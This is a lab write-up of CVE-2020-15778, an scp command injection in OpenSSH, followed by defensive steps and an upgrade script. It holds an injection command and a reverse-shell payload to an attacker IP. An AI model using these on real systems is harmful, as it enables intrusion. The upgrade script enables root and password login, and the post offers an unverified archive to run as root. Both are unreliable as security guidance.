OpenSSH_8.3 and below-command injection vulnerability attack and repair
Vulnerability: CVE-2020-15778
was discovered on June 9, 2020, and the vulnerability was disclosed on July 18, 2020.
Principle of Attack
Use the remote function in SCP for command injection.
Vulnerability reproduction requirements
OpenSSH version=<8.3p1
ssh connection password
Attack environment
Attacker: kali: 192.168.0.130
Target machine: CentOS7:192.168.0.187
Attack test
time:
Upload any file to the target machine, the file is allowed to be empty, because the uploaded file is not the protagonist. Rather, the commands inside are used as injection points to attack.
scp dic.txt [email protected]:'`touch /tmp/test.txt` /tmp'
Command Interpretation: Use scp to dic.txt
upload local files to the server [email protected]
's /tmp
folder, and use `` to enclose the touch /tmp/test.txt
injected command, which will generate a new file test.txt
.
target drone:
The target machine looks /tmp
at the files in the directory:
[root@localhost tmp]# ls
dic.txt test.txt
This realizes the execution of remote commands.
GetShell
time:
Use the command to obtain the permission of the target machine.
#使用一个窗口开启nc进行监听
nc -lvvp 7777
#开启另一个窗口,上传反弹shell的命令
scp dic.txt [email protected]:'`bash -i >& /dev/tcp/192.168.0.130/7777 0>&1`/tmp/attack.txt'
Run the monitor:
Upload injection command:
View monitoring results:
You can execute commands and get response information.
Attack summary
The vulnerability is easy to reproduce, but you need to know the ssh password. Mainly for 已知ssh密码,但没有访问权限/登录权限的攻击
.
Way of defense
Turn off network access
Modify the configuration file/etc/hosts.allow
Use the following format to add ssh access permissions:
sshd:192.168.0.158:allow #允许IP地址为192.168.0.158的主机使用ssh连接
sshd:192.168.0.*:allow #允许IP地址段为:192.168.0.0/24的主机使用ssh连接
sshd:all:deny #拒绝除允许地址之外的所有主机使用ssh连接
This method is mainly used to deny the remote ssh login of the target machine and improve the security of ssh login.
Upgrade openssh to openssh8.4p1 version
Run through a shell script:
#!/bin/bash
#更新ssh服务脚本
#下载
function download()
{
##下载-将函数内部命令复制到命令行执行
echo "正在获取安装包..."
echo "获取openssh..."
wget https://openbsd.hk/pub/OpenBSD/OpenSSH/portable/openssh-8.4p1.tar.gz
echo "获取openssl..."
wget https://www.openssl.org/source/openssl-1.1.1g.tar.gz
echo "获取zlib..."
wget http://www.zlib.net/zlib-1.2.11.tar.gz
}
echo "请确保脚本与以下文件在同一文件夹:zlib-1.2.11.tar.gz、openssh-8.4p1.tar.gz、openssl-1.1.1g.tar.gz"
echo "如果没有上述文件,请中断(Ctrl+C)脚本。使用编辑器打开本文件,头部有下载方法"
sleep 1
echo "[========> ] 33%"
sleep 1
echo "[================> ] 66%"
sleep 1
echo "[========================> ] 99%"
sleep 1
#解压
echo -e "\033[1;32m 解压安装包 \033[0m"
tar --no-same-owner -zxvf zlib-1.2.11.tar.gz
tar --no-same-owner -zxvf openssh-8.4p1.tar.gz
tar --no-same-owner -zxvf openssl-1.1.1g.tar.gz
#安装zlib
echo -e "\033[1;32m 编译安装 zlib \033[0m"
cd zlib-1.2.11
echo -e "\033[1;32m Now palying : `pwd` \033[0m"
./configure --prefix=/usr/local/zlib
make && make install
sleep 1
#安装openssl
echo ""
echo -e "\033[1;32m 编译安装openssl \033[0m"
cd ../openssl-1.1.1g
echo -e "\033[1;32m Now palying : `pwd` \033[0m"
./config --prefix=/usr/local/ssl --shared
make && make install
echo '/usr/local/ssl/lib' >> /etc/ld.so.conf
ldconfig -v
sleep 1
#安装openssh
echo ""
echo -e "\033[1;32m 编译安装openssh \033[0m"
cd ../openssh-8.4p1
echo -e "\033[1;32m Now palying : `pwd` \033[0m"
./configure --prefix=/usr/local/openssh --with-zlib=/usr/local/zlib --with-ssl-dir=/usr/local/ssl
make && make install
sleep 1
#修改配置文件
echo -e "\033[1;32m 修改ssh配置文件 \033[0m"
echo 'PermitRootLogin yes' >>/usr/local/openssh/etc/sshd_config
echo 'PubkeyAuthentication yes' >>/usr/local/openssh/etc/sshd_config
echo 'PasswordAuthentication yes' >>/usr/local/openssh/etc/sshd_config
#备份原有文件
echo -e "\033[1;32m 备份与修改bin与keygen文件 \033[0m"
systemctl stop sshd
mv /etc/ssh /etc/ssh.bak
mkdir /etc/ssh
cp -rf /usr/local/openssh/etc/* /etc/ssh/
mv /usr/sbin/sshd /usr/sbin/sshd.bak
cp /usr/local/openssh/sbin/sshd /usr/sbin/sshd
mv /usr/bin/ssh /usr/bin/ssh.bak
cp /usr/local/openssh/bin/ssh /usr/bin/ssh
mv /usr/bin/ssh-keygen /usr/bin/ssh-keygen.bak
cp /usr/local/openssh/bin/ssh-keygen /usr/bin/ssh-keygen
#重启服务
echo -e "\033[1;32m 重启服务 \033[0m"
mv /lib/systemd/system/sshd.service .
systemctl daemon-reload
cp ./contrib/redhat/sshd.init /etc/init.d/sshd
/etc/init.d/sshd start
systemctl status sshd
echo -e "\033[1;32m ssh服务更新完成,目前版本"
ssh -V
echo -e "##########\033[0m"
Or download directly
Download link:
Link: https://pan.baidu.com/s/14aegreBtRdH1BShyohEwXw
Extraction code: c47t, after copying this content, open the Baidu Netdisk mobile app, the operation is more convenient
Use the command:
tar -zxvf ssh_update.tar.gz
cd ssh_update/
bash ssh-update.sh
The installation is successful. Check the version:
[root@localhost ssh_update]# ssh -V
OpenSSH_8.4p1, OpenSSL 1.1.1g 21 Apr 2020